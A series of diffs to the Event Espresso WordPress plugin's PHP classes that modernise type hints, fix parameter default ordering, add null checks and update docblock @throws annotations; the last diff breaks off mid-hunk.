--- a/core/business/EE_Processor_Base.class.php
+++ b/core/business/EE_Processor_Base.class.php
@@ -52,18 +52,20 @@ class EE_Processor_Base
     /**
      * debug
      *
-     * @param string          $class
-     * @param string          $func
-     * @param string          $line
-     * @param \EE_Transaction $transaction
-     * @param array           $info
-     * @param bool            $display_request
+     * @param string              $class
+     * @param string              $func
+     * @param string              $line
+     * @param EE_Transaction|null $transaction
+     * @param array               $info
+     * @param bool                $display_request
+     * @throws EE_Error
+     * @throws ReflectionException
      */
     protected function log(
         $class = '',
         $func = '',
         $line = '',
-        EE_Transaction $transaction,
+        EE_Transaction $transaction = null,
         $info = array(),
         $display_request = false
     ) {

--- a/core/db_classes/EE_Base_Class.class.php
+++ b/core/db_classes/EE_Base_Class.class.php
@@ -1578,7 +1578,7 @@ abstract class EE_Base_Class
      * @throws InvalidDataTypeException
      * @throws EE_Error
      */
-    protected function _set_date_time($what = 'T', $datetime_value, $fieldname)
+    protected function _set_date_time($what, $datetime_value, $fieldname)
     {
         $field = $this->_get_dtt_field_settings($fieldname);
         $field->set_timezone($this->_timezone);

--- a/core/db_classes/EE_Base_Class.class.php
+++ b/core/db_classes/EE_Base_Class.class.php
@@ -701,24 +701,22 @@ abstract class EE_Base_Class
         if (! isset($this->_fields[ $fieldname ])) {
             $this->_fields[ $fieldname ] = null;
         }
-        $value = $pretty
+        return $pretty
             ? $field_obj->prepare_for_pretty_echoing($this->_fields[ $fieldname ], $extra_cache_ref)
             : $field_obj->prepare_for_get($this->_fields[ $fieldname ]);
-        return $value;
     }
 
 
     /**
      * set timezone, formats, and output for EE_Datetime_Field objects
      *
-     * @param \EE_Datetime_Field $datetime_field
-     * @param bool               $pretty
-     * @param null               $date_or_time
+     * @param EE_Datetime_Field $datetime_field
+     * @param bool              $pretty
+     * @param null              $date_or_time
      * @return void
      * @throws InvalidArgumentException
      * @throws InvalidInterfaceException
      * @throws InvalidDataTypeException
-     * @throws EE_Error
      */
     protected function _prepare_datetime_field(
         EE_Datetime_Field $datetime_field,
@@ -1321,28 +1319,30 @@ abstract class EE_Base_Class
      * (and the equivalent e_date, e_time, e_datetime).
      *
      * @access   protected
-     * @param string   $field_name   Field on the instantiated EE_Base_Class child object
-     * @param string   $dt_frmt      valid datetime format used for date
-     *                               (if '' then we just use the default on the field,
-     *                               if NULL we use the last-used format)
-     * @param string   $tm_frmt      Same as above except this is for time format
-     * @param string   $date_or_time if NULL then both are returned, otherwise "D" = only date and "T" = only time.
-     * @param  boolean $echo         Whether the dtt is echoing using pretty echoing or just returned using vanilla get
+     * @param string      $field_name   Field on the instantiated EE_Base_Class child object
+     * @param string|null $date_format  valid datetime format used for date
+     *                                  (if '' then we just use the default on the field,
+     *                                  if NULL we use the last-used format)
+     * @param string|null $time_format  Same as above except this is for time format
+     * @param string|null $date_or_time if NULL then both are returned, otherwise "D" = only date and "T" = only time.
+     * @param bool|null   $echo         Whether the datetime is pretty echoing or just returned using vanilla get
      * @return string|bool|EE_Error string on success, FALSE on fail, or EE_Error Exception is thrown
-     *                               if field is not a valid dtt field, or void if echoing
-     * @throws ReflectionException
-     * @throws InvalidArgumentException
-     * @throws InvalidInterfaceException
-     * @throws InvalidDataTypeException
+     *                                  if field is not a valid dtt field, or void if echoing
      * @throws EE_Error
+     * @throws ReflectionException
      */
-    protected function _get_datetime($field_name, $dt_frmt = '', $tm_frmt = '', $date_or_time = '', $echo = false)
-    {
+    protected function _get_datetime(
+        string $field_name,
+        ?string $date_format = '',
+        ?string $time_format = '',
+        ?string $date_or_time = '',
+        ?bool $echo = false
+    ) {
         // clear cached property
         $this->_clear_cached_property($field_name);
         // reset format properties because they are used in get()
-        $this->_dt_frmt = $dt_frmt !== '' ? $dt_frmt : $this->_dt_frmt;
-        $this->_tm_frmt = $tm_frmt !== '' ? $tm_frmt : $this->_tm_frmt;
+        $this->_dt_frmt = $date_format !== '' ? $date_format : $this->_dt_frmt;
+        $this->_tm_frmt = $time_format !== '' ? $time_format : $this->_tm_frmt;
         if ($echo) {
             $this->e($field_name, $date_or_time);
             return '';

--- a/core/db_classes/EE_Base_Class.class.php
+++ b/core/db_classes/EE_Base_Class.class.php
@@ -1565,12 +1565,12 @@ abstract class EE_Base_Class
 
     /**
      * This takes care of setting a date or time independently on a given model object property. This method also
-     * verifies that the given fieldname matches a model object property and is for a EE_Datetime_Field field
+     * verifies that the given field_name matches a model object property and is for a EE_Datetime_Field field
      *
      * @access protected
      * @param string          $what           "T" for time, 'B' for both, 'D' for Date.
      * @param string|DateTime $datetime_value A valid Date or Time string (or DateTime object)
-     * @param string          $fieldname      the name of the field the date OR time is being set on (must match a
+     * @param string          $field_name     the name of the field the date OR time is being set on (must match a
      *                                        EE_Datetime_Field property)
      * @throws ReflectionException
      * @throws InvalidArgumentException
@@ -1578,33 +1578,33 @@ abstract class EE_Base_Class
      * @throws InvalidDataTypeException
      * @throws EE_Error
      */
-    protected function _set_date_time($what, $datetime_value, $fieldname)
+    protected function _set_date_time(string $what, $datetime_value, string $field_name)
     {
-        $field = $this->_get_dtt_field_settings($fieldname);
+        $field = $this->_get_dtt_field_settings($field_name);
         $field->set_timezone($this->_timezone);
         $field->set_date_format($this->_dt_frmt);
         $field->set_time_format($this->_tm_frmt);
         switch ($what) {
             case 'T':
-                $this->_fields[ $fieldname ] = $field->prepare_for_set_with_new_time(
+                $this->_fields[ $field_name ] = $field->prepare_for_set_with_new_time(
                     $datetime_value,
-                    $this->_fields[ $fieldname ]
+                    $this->_fields[ $field_name ]
                 );
                 $this->_has_changes = true;
                 break;
             case 'D':
-                $this->_fields[ $fieldname ] = $field->prepare_for_set_with_new_date(
+                $this->_fields[ $field_name ] = $field->prepare_for_set_with_new_date(
                     $datetime_value,
-                    $this->_fields[ $fieldname ]
+                    $this->_fields[ $field_name ]
                 );
                 $this->_has_changes = true;
                 break;
             case 'B':
-                $this->_fields[ $fieldname ] = $field->prepare_for_set($datetime_value);
+                $this->_fields[ $field_name ] = $field->prepare_for_set($datetime_value);
                 $this->_has_changes = true;
                 break;
         }
-        $this->_clear_cached_property($fieldname);
+        $this->_clear_cached_property($field_name);
     }
 
 

--- a/core/db_classes/EE_Line_Item.class.php
+++ b/core/db_classes/EE_Line_Item.class.php
@@ -259,7 +259,7 @@ class EE_Line_Item extends EE_Base_Class implements EEI_Line_Item
     /**
      * Gets item_id
      *
-     * @return string
+     * @return int
      * @throws EE_Error
      * @throws InvalidArgumentException
      * @throws InvalidDataTypeException
@@ -275,7 +275,7 @@ class EE_Line_Item extends EE_Base_Class implements EEI_Line_Item
     /**
      * Sets item_id
      *
-     * @param string $item_id
+     * @param int $item_id
      * @throws EE_Error
      * @throws InvalidArgumentException
      * @throws InvalidDataTypeException
@@ -763,6 +763,18 @@ class EE_Line_Item extends EE_Base_Class implements EEI_Line_Item
     public function set_is_taxable($is_taxable)
     {
         $this->set('LIN_is_taxable', $is_taxable);
+    }
+
+
+    /**
+     * @param int $timestamp
+     * @throws EE_Error
+     * @throws ReflectionException
+     * @since $VID:$
+     */
+    public function setTimestamp(int $timestamp)
+    {
+        $this->set('LIN_timestamp', $timestamp);
     }
 
 

--- a/core/db_classes/EE_Ticket.class.php
+++ b/core/db_classes/EE_Ticket.class.php
@@ -1282,7 +1282,7 @@ class EE_Ticket extends EE_Soft_Delete_Base_Class implements EEI_Line_Item_Objec
             // echo "\n . qty: " . $qty . '<br />';
         }
         // echo "\nFINAL QTY: " . $qty . "<br /><br />";
-        return $qty;
+        return (int) $qty;
     }
 
 

--- a/core/db_classes/EE_Ticket.class.php
+++ b/core/db_classes/EE_Ticket.class.php
@@ -733,13 +733,13 @@ class EE_Ticket extends EE_Soft_Delete_Base_Class implements EEI_Line_Item_Objec
     /**
      * Gets start_date
      *
-     * @param string $date_format
-     * @param string $time_format
+     * @param string|null $date_format
+     * @param string|null $time_format
      * @return string
      * @throws EE_Error
      * @throws ReflectionException
      */
-    public function start_date($date_format = '', $time_format = '')
+    public function start_date(?string $date_format = '', ?string $time_format = ''): string
     {
         return $this->_get_datetime('TKT_start_date', $date_format, $time_format);
     }
@@ -762,13 +762,13 @@ class EE_Ticket extends EE_Soft_Delete_Base_Class implements EEI_Line_Item_Objec
     /**
      * Gets end_date
      *
-     * @param string $date_format
-     * @param string $time_format
+     * @param string|null $date_format
+     * @param string|null $time_format
      * @return string
      * @throws EE_Error
      * @throws ReflectionException
      */
-    public function end_date($date_format = '', $time_format = '')
+    public function end_date(?string $date_format = '', ?string $time_format = ''): string
     {
         return $this->_get_datetime('TKT_end_date', $date_format, $time_format);
     }

--- a/core/db_models/EEM_Attendee.model.php
+++ b/core/db_models/EEM_Attendee.model.php
@@ -134,7 +134,7 @@ class EEM_Attendee extends EEM_CPT_Base
      * @throws EE_Error
      * @throws InvalidArgumentException
      */
-    protected function __construct($timezone = null, ModelFieldFactory $model_field_factory)
+    protected function __construct($timezone, ModelFieldFactory $model_field_factory)
     {
         $this->singular_item = esc_html__('Attendee', 'event_espresso');
         $this->plural_item = esc_html__('Attendees', 'event_espresso');

--- a/core/db_models/EEM_Base.model.php
+++ b/core/db_models/EEM_Base.model.php
@@ -872,6 +872,7 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      * @throws InvalidArgumentException
      * @throws InvalidDataTypeException
      * @throws InvalidInterfaceException
+     * @throws ReflectionException
      */
     public function status_array($translated = false)
     {
@@ -958,6 +959,8 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *
      * @return string|boolean string on success, boolean false when there is no
      * foreign key to the WP_User table
+     * @throws ReflectionException
+     * @throws ReflectionException
      */
     public function wp_user_field_name()
     {
@@ -1664,6 +1667,7 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *                                         rows affected which *could* include 0 which DOES NOT mean the query was
      *                                         bad)
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function update($fields_n_values, $query_params, $keep_model_objs_in_sync = true)
     {
@@ -1967,6 +1971,7 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *                                DB
      * @return int how many rows got deleted
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function delete_permanently($query_params, $allow_blocking = true)
     {
@@ -2087,6 +2092,7 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *                                                 before removing the relation between A and B
      * @return boolean
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function delete_is_blocked_by_related_models($this_model_obj_or_id, $ignore_this_model_obj = null)
     {
@@ -2244,6 +2250,8 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *
      * @param string $qualified_column_name eg 'Event_CPT.post_name' or $field_obj->get_qualified_column()
      * @return EE_Model_Field_Base
+     * @throws EE_Error
+     * @throws EE_Error
      */
     public function get_field_by_column($qualified_column_name)
     {
@@ -2629,7 +2637,7 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      * @param string $relationName
      * @param array  $where_query_params
      * @param EE_Base_Class[] objects to which relations were removed
-     * @return \EE_Base_Class[]
+     * @return EE_Base_Class[]
      * @throws EE_Error
      */
     public function remove_relations($id_or_obj, $relationName, $where_query_params = [])
@@ -2927,6 +2935,7 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *                                                 STRING primary keys cannot be ignored
      * @return EE_Base_Class|array
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function get_one_conflicting($obj_or_fields_array, $include_primary_key = true)
     {
@@ -3295,8 +3304,8 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *                                                      https://github.com/eventespresso/event-espresso-core/tree/master/docs/G--Model-System/model-query-params.md#-0-where-conditions
      * @param EE_Model_Query_Info_Carrier $model_query_info_carrier
      * @param string                      $query_param_type one of $this->_allowed_query_params
+     * @return EE_Model_Query_Info_Carrier
      * @throws EE_Error
-     * @return \EE_Model_Query_Info_Carrier
      */
     private function _extract_related_models_from_sub_params_array_keys(
         $sub_query_params,
@@ -3377,8 +3386,8 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *                                                      https://github.com/eventespresso/event-espresso-core/tree/master/docs/G--Model-System/model-query-params.md#0-where-conditions
      * @param EE_Model_Query_Info_Carrier $model_query_info_carrier
      * @param string                      $query_param_type one of $this->_allowed_query_params
+     * @return EE_Model_Query_Info_Carrier
      * @throws EE_Error
-     * @return \EE_Model_Query_Info_Carrier
      */
     private function _extract_related_models_from_sub_params_array_values(
         $sub_query_params,
@@ -3417,9 +3426,9 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *
      * @param array $query_params @see
      *                            https://github.com/eventespresso/event-espresso-core/tree/master/docs/G--Model-System/model-query-params.md
-     * @throws EE_Error
      * @return EE_Model_Query_Info_Carrier
-     * @throws ModelConfigurationException
+     * @throws EE_Error
+     * @throws ModelConfigurationException*@throws ReflectionException
      */
     public function _create_model_query_info_carrier($query_params)
     {
@@ -3879,7 +3888,9 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *
      * @param string $model_relation_path eg, path from Event to Payment is "Registration.Transaction.Payment."
      * @return array @see
-     *               https://github.com/eventespresso/event-espresso-core/tree/master/docs/G--Model-System/model-query-params.md#0-where-conditions
+     *                                    https://github.com/eventespresso/event-espresso-core/tree/master/docs/G--Model-System/model-query-params.md#0-where-conditions
+     * @throws EE_Error
+     * @throws EE_Error
      */
     private function _get_default_where_conditions($model_relation_path = '')
     {
@@ -3899,7 +3910,9 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *
      * @param string $model_relation_path eg, path from Event to Payment is "Registration.Transaction.Payment."
      * @return array @see
-     *               https://github.com/eventespresso/event-espresso-core/tree/master/docs/G--Model-System/model-query-params.md#0-where-conditions
+     *                                    https://github.com/eventespresso/event-espresso-core/tree/master/docs/G--Model-System/model-query-params.md#0-where-conditions
+     * @throws EE_Error
+     * @throws EE_Error
      */
     protected function _get_minimum_where_conditions($model_relation_path = '')
     {
@@ -4755,6 +4768,8 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      * @param string       $table_alias The table the select is being built for
      * @param mixed|string $limit       The limit for this select
      * @return string                The final select join element for the query.
+     * @throws EE_Error
+     * @throws EE_Error
      */
     public function _construct_limit_join_select($table_alias, $limit)
     {
@@ -4801,6 +4816,8 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *
      * @param string $alias_prefixed table alias to join to (this table should already be in the FROM SQL clause)
      * @return string
+     * @throws EE_Error
+     * @throws EE_Error
      */
     public function _construct_internal_join_to_table_with_alias($alias_prefixed)
     {
@@ -5154,9 +5171,10 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *
      * @access        private
      * @param array $rows        of results of $wpdb->get_results($query,ARRAY_A)
-     * @return \EE_Base_Class[] array keys are primary keys (if there is a primary key on the model. if not,
+     * @return EE_Base_Class[] array keys are primary keys (if there is a primary key on the model. if not,
      *                           numerically indexed)
      * @throws EE_Error
+     * @throws ReflectionException
      */
     protected function _create_objects($rows = [])
     {
@@ -5306,6 +5324,7 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *                             or an stdClass where each property is the name of a column,
      * @return EE_Base_Class
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function instantiate_class_from_array_or_object($cols_n_values)
     {
@@ -5383,8 +5402,9 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      * so on multisite, the entity map is specific to the query being done for a specific site.
      *
      * @param EE_Base_Class $object
-     * @return \EE_Base_Class
+     * @return EE_Base_Class
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function add_to_entity_map(EE_Base_Class $object)
     {
@@ -5462,12 +5482,12 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      * Given an array where keys are column (or column alias) names and values,
      * returns an array of their corresponding field names and database values
      *
-     * @param array $cols_n_values
+     * @param array|bool $cols_n_values
      * @return array
      * @throws EE_Error
      * @throws ReflectionException
      */
-    protected function _deduce_fields_n_values_from_cols_n_values(array $cols_n_values): array
+    protected function _deduce_fields_n_values_from_cols_n_values($cols_n_values): array
     {
         $this_model_fields_n_values = [];
         foreach ($this->get_tables() as $table_alias => $table_obj) {
@@ -5503,14 +5523,14 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
 
 
     /**
-     * @param array $cols_n_values
+     * @param array|bool $cols_n_values
      * @param $qualified_column
      * @param $regular_column
      * @return null
      * @throws EE_Error
      * @throws ReflectionException
      */
-    protected function _get_column_value_with_table_alias_or_not(array $cols_n_values, $qualified_column, $regular_column)
+    protected function _get_column_value_with_table_alias_or_not($cols_n_values, $qualified_column, $regular_column)
     {
         $value = null;
         // ask the field what it think it's table_name.column_name should be, and call it the "qualified column"
@@ -5586,8 +5606,9 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *
      * @param int|string    $id
      * @param EE_Base_Class $replacing_model_obj
-     * @return \EE_Base_Class
+     * @return EE_Base_Class
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function refresh_entity_map_with($id, $replacing_model_obj)
     {
@@ -5703,6 +5724,7 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      *                                                       exists in the database. If it does not, we add it
      * @return EE_Base_Class
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function ensure_is_obj($base_class_obj_or_id, $ensure_is_in_db = false)
     {
@@ -5756,6 +5778,7 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      * @param EE_Base_Class|int|string $base_class_obj_or_id
      * @return int|string depending on the type of this model object's ID
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function ensure_is_ID($base_class_obj_or_id)
     {
@@ -5942,7 +5965,8 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      * @param array               $query_params                     @see
      *                                                              https://github.com/eventespresso/event-espresso-core/tree/master/docs/G--Model-System/model-query-params.md
      * @throws EE_Error
-     * @return \EE_Base_Class[] Array keys are object IDs (if there is a primary key on the model. if not, numerically
+     * @throws ReflectionException
+     * @return EE_Base_Class[] Array keys are object IDs (if there is a primary key on the model. if not, numerically
      *                                                              indexed)
      */
     public function get_all_copies($model_object_or_attributes_array, $query_params = [])
@@ -6127,6 +6151,7 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      * @param array $query_params like get_all's
      * @return string[]
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function get_all_names($query_params = [])
     {
@@ -6145,11 +6170,12 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      * this is duplicated effort and reduces efficiency) you would be better to use
      * array_keys() on $model_objects.
      *
-     * @param \EE_Base_Class[] $model_objects
-     * @param boolean          $filter_out_empty_ids if a model object has an ID of '' or 0, don't bother including it
+     * @param EE_Base_Class[] $model_objects
+     * @param boolean         $filter_out_empty_ids if a model object has an ID of '' or 0, don't bother including it
      *                                               in the returned array
      * @return array
      * @throws EE_Error
+     * @throws ReflectionException
      */
     public function get_IDs($model_objects, $filter_out_empty_ids = false)
     {

--- a/core/db_models/EEM_Base.model.php
+++ b/core/db_models/EEM_Base.model.php
@@ -1798,7 +1798,7 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
         }
         $model_query_info = $this->_create_model_query_info_carrier($query_params);
 
-        $SQL = "UPDATE {$model_query_info->get_full_join_sql()} 
+        $SQL = "UPDATE {$model_query_info->get_full_join_sql()}
                 SET {$this->_construct_update_sql($fields_n_values)}
                 {$model_query_info->get_where_sql()}";
         // note: doesn't use _construct_2nd_half_of_select_query() because doesn't accept LIMIT, ORDER BY, etc.
@@ -5482,13 +5482,16 @@ abstract class EEM_Base extends EE_Base implements ResettableInterface
      * Given an array where keys are column (or column alias) names and values,
      * returns an array of their corresponding field names and database values
      *
-     * @param array|bool $cols_n_values
+     * @param array|stdClass $cols_n_values
      * @return array
      * @throws EE_Error
      * @throws ReflectionException
      */
     protected function _deduce_fields_n_values_from_cols_n_values($cols_n_values): array
     {
+        if ($cols_n_values instanceof stdClass) {
+            $cols_n_values = get_object_vars($cols_n_values);
+        }
         $this_model_fields_n_values = [];
         foreach ($this->get_tables() as $table_alias => $table_obj) {
             $table_pk_value = $this->_get_column_value_with_table_alias_or_not(

--- a/core/db_models/EEM_Event.model.php
+++ b/core/db_models/EEM_Event.model.php
@@ -462,9 +462,9 @@ class EEM_Event extends EEM_CPT_Base
      * @throws InvalidInterfaceException
      * @throws ReflectionException
      */
-    public function get_question_groups_for_event($EVT_ID = 0, EE_Registration $registration)
+    public function get_question_groups_for_event($EVT_ID, EE_Registration $registration)
     {
-        if (! isset($EVT_ID) || ! absint($EVT_ID)) {
+        if (! absint($EVT_ID)) {
             EE_Error::add_error(
                 esc_html__(
                     'An error occurred. No Question Groups could be retrieved because an Event ID was not received.',

--- a/core/db_models/EEM_Term.model.php
+++ b/core/db_models/EEM_Term.model.php
@@ -173,6 +173,9 @@ class EEM_Term extends EEM_Base
                 'limit' => 2
             )
         );
+        if (! $post_tag_results) {
+            return null;
+        }
 
         $post_types = array();
         foreach ((array) $post_tag_results as $row) {

--- a/core/db_models/EEM_WP_User.model.php
+++ b/core/db_models/EEM_WP_User.model.php
@@ -28,7 +28,7 @@ class EEM_WP_User extends EEM_Base
      * @throws EE_Error
      * @throws InvalidArgumentException
      */
-    protected function __construct($timezone = null, ModelFieldFactory $model_field_factory)
+    protected function __construct($timezone, ModelFieldFactory $model_field_factory)
     {
         $this->singular_item = esc_html__('WP_User', 'event_espresso');
         $this->plural_item = esc_html__('WP_Users', 'event_espresso');

--- a/core/db_models/fields/EE_Datetime_Field.php
+++ b/core/db_models/fields/EE_Datetime_Field.php
@@ -212,8 +212,8 @@ class EE_Datetime_Field extends EE_Model_Field_Base
 
             default:
                 return $pretty
-                    ? $this->_pretty_date_format . ' ' . $this->_pretty_time_format
-                    : $this->_date_format . ' ' . $this->_time_format;
+                    ? trim($this->_pretty_date_format . ' ' . $this->_pretty_time_format)
+                    : trim($this->_date_format . ' ' . $this->_time_format);
         }
     }
 

--- a/core/helpers/EEH_Activation.helper.php
+++ b/core/helpers/EEH_Activation.helper.php
@@ -359,11 +359,11 @@ class EEH_Activation implements ResettableInterface
 
     /**
      * @param array|stdClass $settings
-     * @param string         $config
+     * @param int|string         $config
      * @param EE_Config      $EE_Config
      * @return stdClass
      */
-    public static function migrate_old_config_data($settings = [], $config = '', EE_Config $EE_Config)
+    public static function migrate_old_config_data($settings, $config, EE_Config $EE_Config)
     {
         $convert_from_array = ['addons'];
         // in case old settings were saved as an array

--- a/core/helpers/EEH_Line_Item.helper.php
+++ b/core/helpers/EEH_Line_Item.helper.php
@@ -148,18 +148,18 @@ class EEH_Line_Item
      * You should call EE_Registration_Processor::calculate_reg_final_prices_per_line_item()
      * after using this, to keep the registration final prices in-sync with the transaction's total.
      *
-     * @param EE_Line_Item $total_line_item grand total line item of type EEM_Line_Item::type_total
-     * @param EE_Ticket    $ticket
-     * @param int          $qty
+     * @param EE_Line_Item|null $total_line_item grand total line item of type EEM_Line_Item::type_total
+     * @param EE_Ticket         $ticket
+     * @param int               $qty
      * @return EE_Line_Item
      * @throws EE_Error
-     * @throws InvalidArgumentException
-     * @throws InvalidDataTypeException
-     * @throws InvalidInterfaceException
      * @throws ReflectionException
      */
-    public static function add_ticket_purchase(EE_Line_Item $total_line_item, EE_Ticket $ticket, $qty = 1)
-    {
+    public static function add_ticket_purchase(
+        ?EE_Line_Item $total_line_item,
+        EE_Ticket $ticket,
+        int $qty = 1
+    ): ?EE_Line_Item {
         if (! $total_line_item instanceof EE_Line_Item || ! $total_line_item->is_total()) {
             throw new EE_Error(
                 sprintf(
@@ -204,7 +204,7 @@ class EEH_Line_Item
         $line_item = null;
         if ($total_line_item instanceof EE_Line_Item && $total_line_item->is_total()) {
             $ticket_line_items = EEH_Line_Item::get_ticket_line_items($total_line_item);
-            foreach ((array) $ticket_line_items as $ticket_line_item) {
+            foreach ($ticket_line_items as $ticket_line_item) {
                 if (
                     $ticket_line_item instanceof EE_Line_Item
                     && (int) $ticket_line_item->OBJ_ID() === (int) $ticket->ID()

--- a/core/libraries/form_sections/inputs/EE_Country_Select_Input.php
+++ b/core/libraries/form_sections/inputs/EE_Country_Select_Input.php
@@ -39,12 +39,10 @@ class EE_Country_Select_Input extends EE_Select_Input
      * @throws InvalidInterfaceException
      * @throws ReflectionException
      */
-    public function __construct($country_options = null, $input_settings = array())
+    public function __construct($country_options = null, $input_settings = [])
     {
-        $get = isset($input_settings[ self::OPTION_GET_KEY ])
-            ? $input_settings[ self::OPTION_GET_KEY ]
-            : self::OPTION_GET_ACTIVE;
-        $country_options = apply_filters(
+        $get                          = $input_settings[ self::OPTION_GET_KEY ] ?? self::OPTION_GET_ACTIVE;
+        $country_options              = apply_filters(
             'FHEE__EE_Country_Select_Input____construct__country_options',
             $this->get_country_answer_options($country_options, $get),
             $this,
@@ -60,8 +58,8 @@ class EE_Country_Select_Input extends EE_Select_Input
     /**
      * get_country_answer_options
      *
-     * @param array  $country_options
-     * @param string $get
+     * @param array|null $country_options
+     * @param string     $get
      * @return array
      * @throws EE_Error
      * @throws InvalidArgumentException
@@ -69,8 +67,10 @@ class EE_Country_Select_Input extends EE_Select_Input
      * @throws InvalidDataTypeException
      * @throws InvalidInterfaceException
      */
-    public function get_country_answer_options($country_options = null, $get = self::OPTION_GET_ACTIVE)
-    {
+    public function get_country_answer_options(
+        array $country_options = null,
+        string $get = self::OPTION_GET_ACTIVE
+    ): ?array {
         // if passed something that is NOT an array
         if (! is_array($country_options)) {
             // get possibly cached list of countries
@@ -85,7 +85,7 @@ class EE_Country_Select_Input extends EE_Select_Input
                     }
                 }
             } else {
-                $country_options = array();
+                $country_options = [];
             }
         }
         return $country_options;

--- a/core/libraries/messages/defaults/EE_Messages_Template_Defaults.lib.php
+++ b/core/libraries/messages/defaults/EE_Messages_Template_Defaults.lib.php
@@ -82,7 +82,7 @@ class EE_Messages_Template_Defaults extends EE_Base
     public function __construct(
         EE_messenger $messenger,
         EE_message_type $message_type,
-        $GRP_ID = 0,
+        $GRP_ID,
         EEM_Message_Template_Group $message_template_group_model,
         EEM_Message_Template $message_template_model
     ) {
@@ -105,7 +105,7 @@ class EE_Messages_Template_Defaults extends EE_Base
      *                              about where to obtain the templates.
      *
      */
-    final private function _set_templates($template_pack)
+    private function _set_templates($template_pack)
     {
 
         // get the corresponding template pack object (if present.  If not then we just load the default and add a

--- a/core/libraries/messages/messenger/EE_Html_messenger.class.php
+++ b/core/libraries/messages/messenger/EE_Html_messenger.class.php
@@ -541,8 +541,8 @@ class EE_Html_messenger extends EE_messenger
      * @return string
      */
     public function add_powered_by_credit_link_to_receipt_and_invoice(
-        $content = '',
-        $content_again = '',
+        $content,
+        $content_again,
         EE_message_type $incoming_message_type
     ) {
         if (

--- a/core/services/notices/NoticesContainer.php
+++ b/core/services/notices/NoticesContainer.php
@@ -87,7 +87,7 @@ class NoticesContainer implements NoticesContainerInterface
      * @param string $line
      * @throws InvalidDataTypeException
      */
-    public function addError($notice, $dismissible = true, $file, $func, $line)
+    public function addError($notice, $dismissible = true, $file = '', $func = '', $line = '')
     {
         $this->error[] = new Notice(
             Notice::ERROR,

--- a/core/services/notices/NoticesContainerInterface.php
+++ b/core/services/notices/NoticesContainerInterface.php
@@ -41,7 +41,7 @@ interface NoticesContainerInterface
      * @param string $func
      * @param string $line
      */
-    public function addError($notice, $dismissible = true, $file, $func, $line);
+    public function addError($notice, $dismissible = true, $file = '', $func = '', $line = '');
 
 
 

--- a/modules/add_new_state/EED_Add_New_State.module.php
+++ b/modules/add_new_state/EED_Add_New_State.module.php
@@ -236,8 +236,8 @@ class EED_Add_New_State extends EED_Module
      * @throws EE_Error
      * @throws ReflectionException
      */
-    public static function display_add_new_state_micro_form(EE_Form_Section_Proper $question_group_reg_form)
-    {
+    public static function display_add_new_state_micro_form(EE_Form_Section_Proper $question_group_reg_form
+    ): EE_Form_Section_Proper {
         $request = self::getRequest();
         // only add the 'new_state_micro_form' when displaying reg forms,
         // not during processing since we process the 'new_state_micro_form' in it's own AJAX request
@@ -389,9 +389,9 @@ class EED_Add_New_State extends EED_Module
                                 ),
                                 'html_class'            => $input->html_class() . ' new-state-abbrv',
                                 'html_label_text'       => esc_html__(
-                                    'New State/Province Abbreviation',
-                                    'event_espresso'
-                                ) . ' *',
+                                                               'New State/Province Abbreviation',
+                                                               'event_espresso'
+                                                           ) . ' *',
                                 'other_html_attributes' => 'size="24"',
                                 'default'               => $request->getRequestParam($abbrv_name),
                                 'required'              => false,
@@ -563,7 +563,7 @@ class EED_Add_New_State extends EED_Module
      * @param array $request_params
      * @return array
      */
-    public static function filter_checkout_request_params($request_params)
+    public static function filter_checkout_request_params(array $request_params): array
     {
         foreach ($request_params as $form_section) {
             if (is_array($form_section)) {
@@ -579,7 +579,7 @@ class EED_Add_New_State extends EED_Module
      * @param array $request_params
      * @return array
      */
-    public static function unset_new_state_request_params($request_params)
+    public static function unset_new_state_request_params(array $request_params): array
     {
         unset(
             $request_params['new_state_micro_form'],
@@ -598,7 +598,7 @@ class EED_Add_New_State extends EED_Module
      * @throws EE_Error
      * @throws ReflectionException
      */
-    public static function save_new_state_to_db($props_n_values = [])
+    public static function save_new_state_to_db(array $props_n_values = []): ?EE_State
     {
         /** @var EE_State[] $existing_state */
         $existing_state = EEM_State::instance()->get_all([$props_n_values, 'limit' => 1]);
@@ -647,7 +647,7 @@ class EED_Add_New_State extends EED_Module
 
     /**
      * @param string $CNT_ISO
-     * @param string $STA_ID
+     * @param int    $STA_ID
      * @param array  $cols_n_values
      * @return void
      * @throws DomainException
@@ -655,8 +655,9 @@ class EED_Add_New_State extends EED_Module
      * @throws InvalidArgumentException
      * @throws InvalidDataTypeException
      * @throws InvalidInterfaceException
+     * @throws ReflectionException
      */
-    public static function update_country_settings($CNT_ISO = '', $STA_ID = '', $cols_n_values = [])
